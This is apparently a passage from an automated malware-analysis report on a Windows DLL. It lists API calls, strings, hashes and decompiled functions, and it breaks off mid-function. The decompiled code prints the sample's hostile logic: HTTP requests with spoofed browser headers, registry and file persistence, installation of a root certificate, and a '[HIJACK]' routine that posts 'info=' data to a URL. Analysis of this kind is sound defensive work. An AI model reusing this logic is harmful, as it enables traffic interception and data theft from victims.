                                                                                                                                                                            • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021598
                                                                                                                                                                            • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215AF
                                                                                                                                                                            • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215D7
                                                                                                                                                                          • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 10021FBC
                                                                                                                                                                          • _memset.LIBCMT ref: 1002201E
                                                                                                                                                                          • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 100220C2
                                                                                                                                                                          • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 100220DB
                                                                                                                                                                          • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002210B
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10022111
                                                                                                                                                                          • _memset.LIBCMT ref: 1002214B
                                                                                                                                                                          • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 1002216B
                                                                                                                                                                          • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022226
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10022230
                                                                                                                                                                          • _printf.LIBCMT ref: 1002223C
                                                                                                                                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022371
                                                                                                                                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022381
                                                                                                                                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022391
                                                                                                                                                                          Strings
                                                                                                                                                                          • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021DD7
                                                                                                                                                                          • POST, xrefs: 10021BE8
                                                                                                                                                                          • A WinHTTP Example Program/1.0, xrefs: 10021C1F
                                                                                                                                                                          • GET, xrefs: 10021BD3
                                                                                                                                                                          • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022237
                                                                                                                                                                          • Out of memory., xrefs: 10022278
                                                                                                                                                                          • Content-Type: application/x-www-form-urlencoded, xrefs: 10021F1F
                                                                                                                                                                          • Content-Type: multipart/form-data; boundary=%ws, xrefs: 10021F68
                                                                                                                                                                          • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 100222CF
                                                                                                                                                                          • Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021DED
                                                                                                                                                                          • upgrade-insecure-requests: 1, xrefs: 10021E03
                                                                                                                                                                          • Cookie: , xrefs: 10021E9D
                                                                                                                                                                          • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021DC1
                                                                                                                                                                          • P, xrefs: 10021B2E
                                                                                                                                                                          • HTTP/1.1, xrefs: 10021CE3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
                                                                                                                                                                          • String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
                                                                                                                                                                          • API String ID: 2394362766-3430901228
                                                                                                                                                                          • Opcode ID: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
                                                                                                                                                                          • Instruction ID: 00e1b7ec85819600eadfa1f4c4e1cc9d1ca762337438c411615f13f897333fae
                                                                                                                                                                          • Opcode Fuzzy Hash: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D4238B5D00218EBEB10CFA4DC85BEEB7B5FB48304F508258F609A7281D779AA84CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00445DCF, Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 345filememoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __calloc_impl.LIBCMT ref: 00445DDE
                                                                                                                                                                          • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004462DC
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00446313
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0044634C
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00446365
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 004463A2
                                                                                                                                                                          • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0044643D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser__calloc_impl
                                                                                                                                                                          • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect$eFileNameA$eNameA
                                                                                                                                                                          • API String ID: 3477008394-1099821101
                                                                                                                                                                          • Opcode ID: b3b2b8505b7e6efc5623bb82e1659dffd7832b679be7e926eaac381cd2b512cc
                                                                                                                                                                          • Instruction ID: 92c00295a1748db035c2a3cc5971eaa4fa31c544e1f1bb5c84cce870d51fbf1a
                                                                                                                                                                          • Opcode Fuzzy Hash: b3b2b8505b7e6efc5623bb82e1659dffd7832b679be7e926eaac381cd2b512cc
                                                                                                                                                                          • Instruction Fuzzy Hash: 8012CE70D082E8DAEB21CB64CC58BDEBFB56F16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00445DF0, Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 330filememoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004462DC
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00446313
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0044634C
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00446365
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 004463A2
                                                                                                                                                                          • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0044643D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                                          • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                          • API String ID: 4217122820-3199432782
                                                                                                                                                                          • Opcode ID: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                          • Instruction ID: 6cedba83c7d9bafe838ce5be11e1900a1a46eff271120bcd53cc19314cb7e4b2
                                                                                                                                                                          • Opcode Fuzzy Hash: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B12AE70D082E8DAEB21CB64CC58BDEBFB56F16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1000E90E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                          			E1000E90E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033347c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10333484 = (_t20 << 8) + _t39;
						 *0x10333488 = _t20;
						 *0x1033348c = _t39;
						 *0x10333480 = _t47;
						_t21 = E1000F7BF(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E100133E0(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E10015081();
								 *0x10336f64 = GetCommandLineA();
								 *0x103332fc = E10014F4C(); // executed
								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014E93(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014BD4();
										goto L10;
									} else {
										_t32 = E10014C20(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103332f8 =  *0x103332f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E100130CA();
									goto L8;
								}
							} else {
								L8:
								E1000F819();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                                          0x1000e90e
                                                                                                                                                                          0x1000e925
                                                                                                                                                                          0x1000e929
                                                                                                                                                                          0x1000e933
                                                                                                                                                                          0x1000e935
                                                                                                                                                                          0x1000e93b
                                                                                                                                                                          0x1000e93d
                                                                                                                                                                          0x1000e93e
                                                                                                                                                                          0x1000e940
                                                                                                                                                                          0x1000e953
                                                                                                                                                                          0x1000e959
                                                                                                                                                                          0x1000e95f
                                                                                                                                                                          0x1000e962
                                                                                                                                                                          0x1000e96b
                                                                                                                                                                          0x1000e971
                                                                                                                                                                          0x1000e974
                                                                                                                                                                          0x1000e977
                                                                                                                                                                          0x1000e979
                                                                                                                                                                          0x1000e979
                                                                                                                                                                          0x1000e979
                                                                                                                                                                          0x1000e97f
                                                                                                                                                                          0x1000e982
                                                                                                                                                                          0x1000e987
                                                                                                                                                                          0x1000e98f
                                                                                                                                                                          0x1000e993
                                                                                                                                                                          0x1000e999
                                                                                                                                                                          0x1000e99e
                                                                                                                                                                          0x1000e9a4
                                                                                                                                                                          0x1000e9aa
                                                                                                                                                                          0x1000e9af
                                                                                                                                                                          0x1000e9b1
                                                                                                                                                                          0x1000e9b2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000e9b8
                                                                                                                                                                          0x1000e9b8
                                                                                                                                                                          0x1000e9bd
                                                                                                                                                                          0x1000e9bf
                                                                                                                                                                          0x1000e9cb
                                                                                                                                                                          0x1000e9d6
                                                                                                                                                                          0x1000e9e0
                                                                                                                                                                          0x1000e9e5
                                                                                                                                                                          0x1000e9ea
                                                                                                                                                                          0x1000e9ec
                                                                                                                                                                          0x1000e9f5
                                                                                                                                                                          0x1000e9fa
                                                                                                                                                                          0x1000e9fc
                                                                                                                                                                          0x1000ea1e
                                                                                                                                                                          0x1000ea1e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000e9fe
                                                                                                                                                                          0x1000e9fe
                                                                                                                                                                          0x1000ea03
                                                                                                                                                                          0x1000ea05
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ea07
                                                                                                                                                                          0x1000ea09
                                                                                                                                                                          0x1000ea0e
                                                                                                                                                                          0x1000ea11
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ea13
                                                                                                                                                                          0x1000ea13
                                                                                                                                                                          0x1000eacc
                                                                                                                                                                          0x1000eacc
                                                                                                                                                                          0x1000eacc
                                                                                                                                                                          0x1000ea11
                                                                                                                                                                          0x1000ea05
                                                                                                                                                                          0x1000e9ee
                                                                                                                                                                          0x1000e9ee
                                                                                                                                                                          0x1000e9ee
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000e9ee
                                                                                                                                                                          0x1000e9c1
                                                                                                                                                                          0x1000e9c1
                                                                                                                                                                          0x1000e9c1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000e9c1
                                                                                                                                                                          0x1000e9bf
                                                                                                                                                                          0x1000e942
                                                                                                                                                                          0x1000e945
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000e945
                                                                                                                                                                          0x1000e92b
                                                                                                                                                                          0x1000e92b
                                                                                                                                                                          0x1000e92b
                                                                                                                                                                          0x1000e92b
                                                                                                                                                                          0x1000ead1

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2870529951-0
                                                                                                                                                                          • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                                          • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                                          • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001FA30, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                          			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t57;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268); // executed
				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8); // executed
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
								_t99 = _t52;
								if(_t52 != 0) {
									_t54 = E1001F5F0(_a4, _t99,  &_v804, _a4, _a8); // executed
									if(_t54 != 0) {
										_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8); // executed
										_t101 = _t55;
										if(_t55 != 0) {
											_t57 = E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
											if(_t57 != 0) {
												_v536 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				return _v536;
			}



















                                                                                                                                                                          0x1001fa30
                                                                                                                                                                          0x1001fa30
                                                                                                                                                                          0x1001fa39
                                                                                                                                                                          0x1001fa43
                                                                                                                                                                          0x1001fa58
                                                                                                                                                                          0x1001fa6d
                                                                                                                                                                          0x1001fa84
                                                                                                                                                                          0x1001fa8c
                                                                                                                                                                          0x1001faa1
                                                                                                                                                                          0x1001fab6
                                                                                                                                                                          0x1001facd
                                                                                                                                                                          0x1001fad5
                                                                                                                                                                          0x1001faea
                                                                                                                                                                          0x1001faf9
                                                                                                                                                                          0x1001fb13
                                                                                                                                                                          0x1001fb1b
                                                                                                                                                                          0x1001fb1d
                                                                                                                                                                          0x1001fb35
                                                                                                                                                                          0x1001fb3d
                                                                                                                                                                          0x1001fb3f
                                                                                                                                                                          0x1001fb54
                                                                                                                                                                          0x1001fb5c
                                                                                                                                                                          0x1001fb5e
                                                                                                                                                                          0x1001fb76
                                                                                                                                                                          0x1001fb7e
                                                                                                                                                                          0x1001fb80
                                                                                                                                                                          0x1001fb94
                                                                                                                                                                          0x1001fb9c
                                                                                                                                                                          0x1001fb9e
                                                                                                                                                                          0x1001fbaf
                                                                                                                                                                          0x1001fbb9
                                                                                                                                                                          0x1001fbc3
                                                                                                                                                                          0x1001fbcb
                                                                                                                                                                          0x1001fbcd
                                                                                                                                                                          0x1001fbe3
                                                                                                                                                                          0x1001fbed
                                                                                                                                                                          0x1001fbef
                                                                                                                                                                          0x1001fbef
                                                                                                                                                                          0x1001fbed
                                                                                                                                                                          0x1001fbcd
                                                                                                                                                                          0x1001fbb9
                                                                                                                                                                          0x1001fb9e
                                                                                                                                                                          0x1001fb80
                                                                                                                                                                          0x1001fb5e
                                                                                                                                                                          0x1001fb3f
                                                                                                                                                                          0x1001fc02

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                                          • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                                          • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                                            • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                                            • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                                            • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                                            • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                                            • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                                            • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                                            • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                                            • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                                            • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                                            • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                                          Strings
                                                                                                                                                                          • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                                          • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                                          • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                                          • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                                          • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                                          • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                                          • API String ID: 475603772-4188859120
                                                                                                                                                                          • Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                                          • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                                          • Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                                          • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10022760, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v72;
				char _v100;
				char _v128;
				intOrPtr _v132;
				char _v160;
				char _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				void* __ebp;
				char* _t56;
				void* _t75;
				void* _t76;
				intOrPtr _t119;
				void* _t127;

				_t127 = __eflags;
				_t118 = __esi;
				_t117 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(E10022C17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_v192 = 0;
				_push(_a12);
				_push(0x30);
				_push("post_info");
				_t56 = PathFindFileNameA(".\\post_info.cpp"); // executed
				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t56); // executed
				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
				_v8 = 0;
				_v196 = E10001160( &_v160, _t127, _a8);
				_v200 = _v196;
				_v8 = 1;
				E10001A70( &_v128, _v200);
				_v8 = 0;
				E100011A0( &_v160);
				E10001160( &_v100, _t127, "info=");
				_v8 = 2;
				_v204 = E10001160( &_v188, _t127, _v132);
				_v208 = _v204;
				_v8 = 3;
				E10001A70( &_v100, _v208);
				_v8 = 2;
				E100011A0( &_v188);
				_push(E100011E0( &_v128));
				_push(0x3d);
				_push("post_info");
				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
				E10001160( &_v44, _t127, 0x10024ca2);
				_v8 = 4;
				E10001160( &_v72, _t127, 0x10024ca3);
				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72); // executed
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127);
